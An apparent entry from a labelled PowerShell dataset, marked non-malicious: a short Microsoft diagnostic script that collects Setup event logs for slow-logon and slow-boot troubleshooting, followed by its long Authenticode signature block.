ggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQDBFWgh2lbgV3eJp01oqiaF # BuYbNc7hSKmktvJ15NrB/DBboUow8WPOTPxbn7gcmIOGmwJkd+TyFx7KOnzrxnoB # 3huvv91fZuUugIsKTnAvg2BU/nfN7Zzn9Kk1mpuJ27S6xUDH4odFiX51ICcKl6EG # 4cxKgcDAinihT8xroJWVATL7p8bbfnwsc1pihZmcvIuYGnb1TY9tnpdChWr9EARu # Co3TiRGjM2Lp4piT2lD5hnd3VaGTepNqyakpkCGV0+cK8Vu/HkIZdvy+z5EL3ojT # dFLL5vJ9IAogWf3XAu3d7SpFaaoeix0e1q55AD94ZwDP+izqLadsBR3tzjq2RfrC # NL+Tmi/jalRto/J6bh4fPhHETnDC78T1yfXUQdGtmJ/utI/ANxi7HV8gAPzid9TY # jMPbYqG8y5xz+gI/SFyj+aKtHHWmKzEXPttXzAcexJ1EH7wbuiVk3sErPK9MLg1X # b6hM5HIWA0jEAZhKEyd5hH2XMibzakbp2s2EJQWasQc4DMaF1EsQ1CzgClDYIYG6 # rUhudfI7k8L9KKCEufRbK5ldRYNAqddr/ySJfuZv3PS3+vtD6X6q1H4UOmjDKdjo # W3qs7JRMZmH9fkFkMzb6YSzr6eX1LoYm3PrO1Jea43SYzlB3Tz84OvuVSV7NcidV # tNqiZeWWpVjfavR+Jj/JOQIDAQABo4IBSTCCAUUwHQYDVR0OBBYEFHSeBazWVcxu # 4qT9O5jT2B+qAerhMB8GA1UdIwQYMBaAFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMF8G # A1UdHwRYMFYwVKBSoFCGTmh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMv # Y3JsL01pY3Jvc29mdCUyMFRpbWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNybDBs # BggrBgEFBQcBAQRgMF4wXAYIKwYBBQUHMAKGUGh0dHA6Ly93d3cubWljcm9zb2Z0 # LmNvbS9wa2lvcHMvY2VydHMvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUy # MDIwMTAoMSkuY3J0MAwGA1UdEwEB/wQCMAAwFgYDVR0lAQH/BAwwCgYIKwYBBQUH # AwgwDgYDVR0PAQH/BAQDAgeAMA0GCSqGSIb3DQEBCwUAA4ICAQCDdN8voPd8C+VW # ZP3+W87c/QbdbWK0sOt9Z4kEOWng7Kmh+WD2LnPJTJKIEaxniOct9wMgJ8yQywR8 # WHgDOvbwqdqsLUaM4NrertI6FI9rhjheaKxNNnBZzHZLDwlkL9vCEDe9Rc0dGSVd # 5Bg3CWknV3uvVau14F55ESTWIBNaQS9Cpo2Opz3cRgAYVfaLFGbArNcRvSWvSUbe # I2IDqRxC4xBbRiNQ+1qHXDCPn0hGsXfL+ynDZncCfszNrlgZT24XghvTzYMHcXio # LVYo/2Hkyow6dI7uULJbKxLX8wHhsiwriXIDCnjLVsG0E5bR82QgcseEhxbU2d1R # VHcQtkUE7W9zxZqZ6/jPmaojZgXQO33XjxOHYYVa/BXcIuu8SMzPjjAAbujwTawp # azLBv997LRB0ZObNckJYyQQpETSflN36jW+z7R/nGyJqRZ3HtZ1lXW1f6zECAeP+ # 9dy6nmcCrVcOqbQHX7Zr8WPcghHJAADlm5ExPh5xi1tNRk+i6F2a9SpTeQnZXP50 # w+JoTxISQq7vBij2nitAsSLaVeMqoPi+NXlTUNZ2NdtbFr6Iir9ZK9ufaz3FxfvD # Zo365vLOozmQOe/Z+pu4vY5zPmtNiVIcQnFy7JZOiZVDI5bIdwQRai2quHKJ6ltU # dsi3HjNnieuE72fT4eWhxtmnN5HYCDCCB3EwggVZoAMCAQICEzMAAAAVxedrngKb # SZkAAAAAABUwDQYJKoZIhvcNAQELBQAwgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQI # EwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3Nv # ZnQgQ29ycG9yYXRpb24xMjAwBgNVBAMTKU1pY3Jvc29mdCBSb290IENlcnRpZmlj # YXRlIEF1dGhvcml0eSAyMDEwMB4XDTIxMDkzMDE4MjIyNVoXDTMwMDkzMDE4MzIy # NVowfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcT # B1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UE # AxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwggIiMA0GCSqGSIb3DQEB # AQUAA4ICDwAwggIKAoICAQDk4aZM57RyIQt5osvXJHm9DtWC0/3unAcH0qlsTnXI # yjVX9gF/bErg4r25PhdgM/9cT8dm95VTcVrifkpa/rg2Z4VGIwy1jRPPdzLAEBjo # YH1qUoNEt6aORmsHFPPFdvWGUNzBRMhxXFExN6AKOG6N7dcP2CZTfDlhAnrEqv1y # aa8dq6z2Nr41JmTamDu6GnszrYBbfowQHJ1S/rboYiXcag/PXfT+jlPP1uyFVk3v # 3byNpOORj7I5LFGc6XBpDco2LXCOMcg1KL3jtIckw+DJj361VI/c+gVVmG1oO5pG # ve2krnopN6zL64NF50ZuyjLVwIYwXE8s4mKyzbnijYjklqwBSru+cakXW2dg3viS # kR4dPf0gz3N9QZpGdc3EXzTdEonW/aUgfX782Z5F37ZyL9t9X4C626p+Nuw2TPYr # bqgSUei/BQOj0XOmTTd0lBw0gg/wEPK3Rxjtp+iZfD9M269ewvPV2HM9Q07BMzlM # jgK8QmguEOqEUUbi0b1qGFphAXPKZ6Je1yh2AuIzGHLXpyDwwvoSCtdjbwzJNmSL # W6CmgyFdXzB0kZSU2LlQ+QuJYfM2BjUYhEfb3BvR/bLUHMVr9lxSUV0S2yW6r1AF # emzFER1y7435UsSFF5PAPBXbGjfHCBUYP3irRbb1Hode2o+eFnJpxq57t7c+auIu # rQIDAQABo4IB3TCCAdkwEgYJKwYBBAGCNxUBBAUCAwEAATAjBgkrBgEEAYI3FQIE # FgQUKqdS/mTEmr6CkTxGNSnPEP8vBO4wHQYDVR0OBBYEFJ+nFV0AXmJdg/Tl0mWn # G1M1GelyMFwGA1UdIARVMFMwUQYMKwYBBAGCN0yDfQEBMEEwPwYIKwYBBQUHAgEW # M2h0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvRG9jcy9SZXBvc2l0b3J5 # Lmh0bTATBgNVHSUEDDAKBggrBgEFBQcDCDAZBgkrBgEEAYI3FAIEDB4KAFMAdQBi # AEMAQTALBgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBTV # 9lbLj+iiXGJo0T2UkFvXzpoYxDBWBgNVHR8ETzBNMEugSaBHhkVodHRwOi8vY3Js # Lm1pY3Jvc29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXRfMjAx # MC0wNi0yMy5jcmwwWgYIKwYBBQUHAQEETjBMMEoGCCsGAQUFBzAChj5odHRwOi8v # d3d3Lm1pY3Jvc29mdC5jb20vcGtpL2NlcnRzL01pY1Jvb0NlckF1dF8yMDEwLTA2 # LTIzLmNydDANBgkqhkiG9w0BAQsFAAOCAgEAnVV9/Cqt4SwfZwExJFvhnnJL/Klv # 6lwUtj5OR2R4sQaTlz0xM7U518JxNj/aZGx80HU5bbsPMeTCj/ts0aGUGCLu6WZn # OlNN3Zi6th542DYunKmCVgADsAW+iehp4LoJ7nvfam++Kctu2D9IdQHZGN5tggz1 # bSNU5HhTdSRXud2f8449xvNo32X2pFaq95W2KFUn0CS9QKC/GbYSEhFdPSfgQJY4 # rPf5KYnDvBewVIVCs/wMnosZiefwC2qBwoEZQhlSdYo2wh3DYXMuLGt7bj8sCXgU # 6ZGyqVvfSaN0DLzskYDSPeZKPmY7T7uG+jIa2Zb0j/aRAfbOxnT99kxybxCrdTDF # NLB62FD+CljdQDzHVG2dY3RILLFORy3BFARxv2T5JL5zbcqOCb2zAVdJVGTZc9d/ # HltEAY5aGZFrDZ+kKNxnGSgkujhLmm77IVRrakURR6nxt67I6IleT53S0Ex2tVdU # CbFpAUR+fKFhbHP+CrvsQWY9af3LwUFJfn6Tvsv4O+S3Fb+0zj6lMVGEvL8CwYKi # excdFYmNcP7ntdAoGokLjzbaukz5m/8K6TT4JDVnK+ANuOaMmdbhIurwJ0I9JZTm # dHRbatGePu1+oDEzfbzL6Xu/OHBE0ZDxyKs6ijoIYn/ZcGNTTY3ugm2lBRDBcQZq # ELQdVTNYs6FwZvKhggNNMIICNQIBATCB+aGB0aSBzjCByzELMAkGA1UEBhMCVVMx # EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT # FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjElMCMGA1UECxMcTWljcm9zb2Z0IEFtZXJp # Y2EgT3BlcmF0aW9uczEnMCUGA1UECxMeblNoaWVsZCBUU1MgRVNOOkEwMDAtMDVF # MC1EOTQ3MSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNloiMK # AQEwBwYFKw4DAhoDFQCABol1u1wwwYgUtUowMnqYvbul3qCBgzCBgKR+MHwxCzAJ # BgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25k # MR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jv # c29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwMA0GCSqGSIb3DQEBCwUAAgUA6smV3jAi # GA8yMDI0MTAyODA0NDcyNloYDzIwMjQxMDI5MDQ0NzI2WjB0MDoGCisGAQQBhFkK # BAExLDAqMAoCBQDqyZXeAgEAMAcCAQACAiCYMAcCAQACAhOLMAoCBQDqyudeAgEA # MDYGCisGAQQBhFkKBAIxKDAmMAwGCisGAQQBhFkKAwKgCjAIAgEAAgMHoSChCjAI # AgEAAgMBhqAwDQYJKoZIhvcNAQELBQADggEBAEFghDjhxi2TSq7RRxDW8oDboQrB # l/FnL9GFyUGkxt5Hz/YPxhSGpJ8w4/Uc7LKfS5rtB+7Ou2rGzeojlAdVUArx1kj9 # 4wVSPeBrEy9PBwhiSqDWDINZjAa60rf5xjy9lMiQcK54bc21WGJa4ZlGC9qrcYoQ # pLqiwuYZS76Io7iSbtEhMY/0WpMko/8XFost2uITk8Hh2RjhtVnZ4rJ1N1+/2kZo # bq1RJX7cvC0OFH4gYrGgGJDLvaPbnwgdNz88IdYs1Nch8qdg7r8oBSko61ML576C # xdcnSGw9Vpf07jA/s0RmTcg81r/kwthHbYIWPw+cOA4BYp09eecPmASoKj8xggQN # MIIECQIBATCBkzB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQ # MA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9u # MSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMAITMwAAAevg # GGy1tu847QABAAAB6zANBglghkgBZQMEAgEFAKCCAUowGgYJKoZIhvcNAQkDMQ0G # CyqGSIb3DQEJEAEEMC8GCSqGSIb3DQEJBDEiBCDtVzltMTpkqS2FA5SmS3wo5Vq8 # XaDDxBFSR/pnijaPkjCB+gYLKoZIhvcNAQkQAi8xgeowgecwgeQwgb0EIM63a75f # aQPhf8SBDTtk2DSUgIbdizXsz76h1JdhLCz4MIGYMIGApH4wfDELMAkGA1UEBhMC # VVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNV # BAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRp # bWUtU3RhbXAgUENBIDIwMTACEzMAAAHr4BhstbbvOO0AAQAAAeswIgQgWXKlh2TC # sXUYprvY+OJSRQQYCPt99/x5xOK3eVkF+jEwDQYJKoZIhvcNAQELBQAEggIAro+t # YRwUxnMUp/r50N+WsStA3qNfNT0PsHiCe4PHh8Q2z4R53g/o9eXWhAqYABAvvD4d # S27a49zGjHJDnD1XD1x+myC/cL3X6p3T8mDE0434YbSKeHoNMOa4f32zz5BM05WY # 5zeHCp7bKi2MbM14nUGNt0iyi1EnIIYbgFTgMY7Xu4mN7+UcLmeg1Q4AlQYDy+43 # 76EdPYi+kUavDPb5cXF8n7olXiPIlH0o2zxHecJ59b0/bW0qroa3DXKNe9wC3Bhh # bRf7kh7NIjDlr+WeB8Y36SdXoht694EjjX1uuzBpkQVR1cFg+2ShB+22KkYsaSbP # L4CZERIwW77LsAEOse6aEbQvOorXl3ofUkbjXTQo5mmKFkpXnOG+uaceGuWl0hRK # pKqv3YETLC6RY3mqq9u3zBtnyDGU/O6KKgic4/VK1LESkLfn2oq5zr+BlvqDXIRe # NME2+9UgKaopl1Y6TZquC/rrFsBk365qG64ltMFu/e5gbfJTcYcmlsRRLwclLgXA # BdSiSCFvSBkrsiv4zyW2mdnXTztH0xsAEYC4dNgl7bae3ObESXFmC2HRp4uNeqIk # 6CaUvO23XRcck3gZ16COdNOKSxfKqq+Kt1/IEuAytlve1YtapNjZNrUfPhChTS7A # FEYUXlt3/eCgR03XvfQ4iaISoI1SuOVhHHd0pHo= # SIG # End signature block
combined_dataset/train/non-malicious/sample_15_26.ps1
sample_15_26.ps1
#Collect Event Logs for Slow Logon/ Slow Boot troubleshooter $EventLogNames = "Setup" Run-DiagExpression .\TS_GetEvents.ps1 -EventLogNames $EventLogNames -SectionDescription "Event Logs" # SIG # Begin signature block # MIIoKgYJKoZIhvcNAQcCoIIoGzCCKBcCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCBwj7Lm6o4602bb # emLqbHuZ+pCMeTVwSH23vgnOwSmXiqCCDXYwggX0MIID3KADAgECAhMzAAAEBGx0 # Bv9XKydyAAAAAAQEMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjQwOTEyMjAxMTE0WhcNMjUwOTExMjAxMTE0WjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQC0KDfaY50MDqsEGdlIzDHBd6CqIMRQWW9Af1LHDDTuFjfDsvna0nEuDSYJmNyz # NB10jpbg0lhvkT1AzfX2TLITSXwS8D+mBzGCWMM/wTpciWBV/pbjSazbzoKvRrNo # DV/u9omOM2Eawyo5JJJdNkM2d8qzkQ0bRuRd4HarmGunSouyb9NY7egWN5E5lUc3 # a2AROzAdHdYpObpCOdeAY2P5XqtJkk79aROpzw16wCjdSn8qMzCBzR7rvH2WVkvF # HLIxZQET1yhPb6lRmpgBQNnzidHV2Ocxjc8wNiIDzgbDkmlx54QPfw7RwQi8p1fy # 4byhBrTjv568x8NGv3gwb0RbAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQU8huhNbETDU+ZWllL4DNMPCijEU4w # RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW # MBQGA1UEBRMNMjMwMDEyKzUwMjkyMzAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci # tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG # CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0 # MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAIjmD9IpQVvfB1QehvpC # Ge7QeTQkKQ7j3bmDMjwSqFL4ri6ae9IFTdpywn5smmtSIyKYDn3/nHtaEn0X1NBj # L5oP0BjAy1sqxD+uy35B+V8wv5GrxhMDJP8l2QjLtH/UglSTIhLqyt8bUAqVfyfp # h4COMRvwwjTvChtCnUXXACuCXYHWalOoc0OU2oGN+mPJIJJxaNQc1sjBsMbGIWv3 # cmgSHkCEmrMv7yaidpePt6V+yPMik+eXw3IfZ5eNOiNgL1rZzgSJfTnvUqiaEQ0X # dG1HbkDv9fv6CTq6m4Ty3IzLiwGSXYxRIXTxT4TYs5VxHy2uFjFXWVSL0J2ARTYL # E4Oyl1wXDF1PX4bxg1yDMfKPHcE1Ijic5lx1KdK1SkaEJdto4hd++05J9Bf9TAmi # u6EK6C9Oe5vRadroJCK26uCUI4zIjL/qG7mswW+qT0CW0gnR9JHkXCWNbo8ccMk1 # sJatmRoSAifbgzaYbUz8+lv+IXy5GFuAmLnNbGjacB3IMGpa+lbFgih57/fIhamq # 5VhxgaEmn/UjWyr+cPiAFWuTVIpfsOjbEAww75wURNM1Imp9NJKye1O24EspEHmb # DmqCUcq7NqkOKIG4PVm3hDDED/WQpzJDkvu4FrIbvyTGVU01vKsg4UfcdiZ0fQ+/ # V0hf8yrtq9CkB8iIuk5bBxuPMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq # hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5 # IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG # EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG # A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg # Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC # CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03 # a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr # rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg # OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy # 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9 # sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh # dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k # A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB # w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn # Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90 # lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w # ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o # ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD # VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa # BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny # bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG # AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t # L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV # HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG # AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl # AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb # C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l # hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6 # I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0 # wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560 # STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam # ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa # J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah # XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA # 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt # Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr # /Xmfwb1tbWrJUnMTDXpQzTGCGgowghoGAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw # EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN # aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp # Z25pbmcgUENBIDIwMTECEzMAAAQEbHQG/1crJ3IAAAAABAQwDQYJYIZIAWUDBAIB # BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO # MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIIKtA0sMOje7K2XA8YpjHUKy # O4pQuhb2k5CyvQ/c3PiLMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A # cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB # BQAEggEAaJqoMCumaIHOearyixhnKL94Vs/LHyQ27CUdMVfqf3AYWWO0nO/TSx6q # cOxDrqiG9pCmvtoJpNdp/IQQ30End67bzpQ9Xp2i9XkkRejmPJNc+pu3WyhgyGc8 # ijpUrnENh3id/MfVYdxGGOuiuo+UUpN2NS1ayAWmo+l+YzI2O/EfmJMIRt6nxuq8 # D80KgLJW6msExLjtkqQjITfYBg4K78FyFkfsZoz7yDZJIdBCMWR15rnZhsxPGN44 # HTZMq9nwmW7aiR5e/RV2XZRp2ZW8BXWgVpPCA2gFSRnGpOByygBqpx4lE+ynnMLK # FzZ6sHVC5Z0gby3AMi4p6D8T3Mb5QqGCF5QwgheQBgorBgEEAYI3AwMBMYIXgDCC # F3wGCSqGSIb3DQEHAqCCF20wghdpAgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFSBgsq # hkiG9w0BCRABBKCCAUEEggE9MIIBOQIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl # AwQCAQUABCC5Ka9YBwIoZIiAzc0UO8l6bUs2AjUWfEjjBJWAFfXA2QIGZxqPzfDR # GBMyMDI0MTAyODExNDA0MC40OTdaMASAAgH0oIHRpIHOMIHLMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1l # cmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046MzMwMy0w # NUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2Wg # ghHqMIIHIDCCBQigAwIBAgITMwAAAebZQp7qAPh94QABAAAB5jANBgkqhkiG9w0B # AQsFADB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE # BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYD # VQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDAeFw0yMzEyMDYxODQ1 # MTVaFw0yNTAzMDUxODQ1MTVaMIHLMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz # aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv # cnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1lcmljYSBPcGVyYXRpb25z # MScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046MzMwMy0wNUUwLUQ5NDcxJTAjBgNV # BAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2UwggIiMA0GCSqGSIb3DQEB # AQUAA4ICDwAwggIKAoICAQC9vph84tgluEzm/wpNKlAjcElGzflvKADZ1D+2d/ie # YYEtF2HKMrKGFDOLpLWWG5DEyiKblYKrE2nt540OGu35Zx0gXJBE0zWanZEAjCjt # 4eGBi+uakZsk70zHTQHHyfP+B3m2BSSNFPhgsVIPp6vo/9t6OeNezIwX5E5+VwEG # 37nZgEexQF2fQZYbxQ1AauqDvRdXsSpK1dh1UBt9EaMszuucaR5nMwQN6sDjG99F # zdK9Atzbn4SmlsoLUtRAh/768sKd0Y1hMmKVHwIX8/4JuURUBRZ0JWu0NYQBp8kh # ku18Q8CAQ500tFB7VH3pD8zoA4lcA7JkxTGoPKrufm+lRZAA4iMgbcLZ2P/xSdnK # FxU8vL31RoNlZJiGL5MqTXvvyBLz+MRP4En9Nye1N8x/lJD1stdNo5wJG+mgXsE/ # zfzg2GaVqQczFHg0Nl8bpIqnNFUReQRq3C1jVYMCScegNzHeYtw5OmZ/7eVnRmjX # lCsLvdsxOzc1YVn6nZLkQD5y31HYrB9iIHuswhaMv2hJNNjVndkpWy934PIZuWTM # k360kjXPFwl2Wv1Tzm9tOrCq8+l408KIL6J+efoGNkR8YB3M+u1tYeVDO/TcObGH # xaGFB6QZxAUpnfB5N/MmBNxMOqzG1N8QiwW8gtjjMJiFBf6iYYrCjtRwF7IPdQLF # tQIDAQABo4IBSTCCAUUwHQYDVR0OBBYEFOUEMXntN54+11ZM+Qu7Q5rg3Fc9MB8G # A1UdIwQYMBaAFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMF8GA1UdHwRYMFYwVKBSoFCG # Tmh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY3JsL01pY3Jvc29mdCUy # MFRpbWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNybDBsBggrBgEFBQcBAQRgMF4w # XAYIKwYBBQUHMAKGUGh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY2Vy # dHMvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3J0MAwG # A1UdEwEB/wQCMAAwFgYDVR0lAQH/BAwwCgYIKwYBBQUHAwgwDgYDVR0PAQH/BAQD # AgeAMA0GCSqGSIb3DQEBCwUAA4ICAQBhbuogTapRsuwSkaFMQ6dyu8ZCYUpWQ8iI # rbi40tU2hK6pHgu0hj0z/9zFRRx5DfhukjvbjA/dS5VYfxz1EIbPlt897MJ2sBGO # 2YLYwYelfJpDwbB0XS9Zkrqpzq6X/lmDQDn3G5vcYpYQCJ55LLvyFlJ195AVo4Wy # 8UX5p7g9W3MgNHQMpM+EV64+cszj4Ho5aQmeKGtKy7w72eRY/vWDuptrvzruFNmK # 